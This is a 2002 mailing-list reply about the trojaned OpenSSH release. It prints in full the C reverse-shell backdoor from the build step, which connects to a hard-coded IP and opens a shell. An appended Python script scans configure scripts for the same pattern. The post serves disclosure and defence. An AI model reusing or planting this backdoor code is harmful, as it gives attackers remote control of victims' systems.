
Re: openssh trojaned..



On Thu, 1 Aug 2002, Jan Wildeboer wrote:

> Lars Hansson wrote:
>
> > They will probably inform us when they have figured out if it's true and
> > if so, how it happened.

I've checked the code on bf-test output and I think it compiles itself and
then tries to connect to 203.62.158.32:6667, then reads from the server a
single character and if the character is "D" it binds a shell back. I
think it is a reverse shell backdoor.

NOTE: The letters checked on switch() are "A" ,"D", "M" (???).

Below is the code executed (formatted by indent):

---------- code start ---------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
void
sig (int sig)
{
  close (s);
  sleep (3600);
  longjmp (env, 0);
}

int
main ()
{
  int x;
  char c, *a[2];
  struct sockaddr_in sa;
  struct sigaction act;
  switch (fork ())
    {
    case 0:
      break;
    default:
      exit (0);
    }
  close (0);
  close (1);
  close (2);
  memset (&act, 0, sizeof (act));
  act.sa_handler = sig;
  sigaction (SIGALRM, &act, NULL);
  do
    {
      setjmp (env);
      if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
        exit (1);
      memset (&sa, 0, sizeof (sa));
      sa.sin_family = AF_INET;
      sa.sin_port = htons (6667);
      sa.sin_addr.s_addr = inet_addr ("203.62.158.32");
      alarm (10);
      if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == (-1))
        exit (1);
      if ((x = read (s, &c, 1)) == (-1))
        {
          exit (1);
        }
      else if (x == 1)
        {
          switch (c)
            {
            case 'A':
              exit (0);
            case 'D':
              alarm (0);
              dup2 (s, 0);
              dup2 (s, 1);
              dup2 (s, 2);
              a[0] = i_val;
              a[1] = NULL;
              execve (a[0], a, NULL);
              break;
            case 'M':
              alarm (0);
              sig (0);
              break;
            default:
            }
        }
      else
        {
          exit (0);
        }
    }
  while (1);
}

_ACEOF
---------- code end --------------------

>
> Well - the word of a trojan in OpenSSH is spreading. It has also been
> mentioned on the Heise Newsticker, a known German site:
>
> http://www.heise.de/newsticker/data/pab-01.08.02-000/
>
> I would expect an immediate response of the OpenSSH people. This is
> hurting the reputation of OpenSSH and OpenBSD too.
>
> Jan Wildeboer
>
>

------------------------------------------------------------

Don't be a zombie process on the most buggy OS ( The World )
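For anyone triaging a downloaded tarball for the same pattern, here is a small added triage script (my own example, not from the thread or the OpenSSH project): it pulls heredoc bodies (the `<<_ACEOF ... _ACEOF` blocks a configure script uses to write out test programs) and flags any that both dial a hard-coded address and exec a program, decoding hex-escaped strings such as the `i_val` literal above. The sample configure fragment is constructed for the demonstration and the file name `bf-test.c` is assumed.

```python
import re

# Constructed sample (not the real trojaned tarball): a configure-script fragment
# that writes a C program through a heredoc, modelled on the code quoted above.
SAMPLE_CONFIGURE = r'''
echo "$as_me: checking bf"
cat > bf-test.c <<_ACEOF
#include <stdio.h>
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
int main () {
  sa.sin_port = htons (6667);
  sa.sin_addr.s_addr = inet_addr ("203.62.158.32");
  execve (a[0], a, NULL);
}
_ACEOF
cat > conftest.c <<_ACEOF
int main () { return 0; }
_ACEOF
'''

HEREDOC_RE = re.compile(r"<<-?\s*['\"]?(\w+)['\"]?\n(.*?)\n\1[ \t]*\n", re.S)
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_hex_escapes(literal):
    """Turn C-style hex escapes into text, e.g. the i_val literal -> /bin/sh."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def find_heredocs(script):
    """Return (delimiter, body) for every heredoc in a shell/configure script."""
    return [(m.group(1), m.group(2)) for m in HEREDOC_RE.finditer(script)]


def triage_heredoc(body):
    """Flag an embedded C program that both dials out and executes a program."""
    ips = re.findall(r'inet_addr\s*\(\s*"([\d.]+)"', body)
    ports = re.findall(r"htons\s*\(\s*(\d+)\s*\)", body)
    endpoints = [(ip, int(port)) for ip, port in zip(ips, ports)]
    strings = [decode_hex_escapes(s)
               for s in re.findall(r'"((?:\\x[0-9a-fA-F]{2})+)"', body)]
    uses_exec = re.search(r"\b(execve|execl|execv|system|popen)\s*\(", body) is not None
    return {"endpoints": endpoints, "decoded_strings": strings,
            "uses_exec": uses_exec, "suspicious": uses_exec and bool(endpoints)}


def scan_configure(script):
    """List (delimiter, triage result) for every suspicious heredoc."""
    findings = []
    for delim, body in find_heredocs(script):
        result = triage_heredoc(body)
        if result["suspicious"]:
            findings.append((delim, result))
    return findings
```

Run `scan_configure` over the `configure` script of a suspect tarball; a genuine autoconf test program never needs a hard-coded remote address together with an exec call.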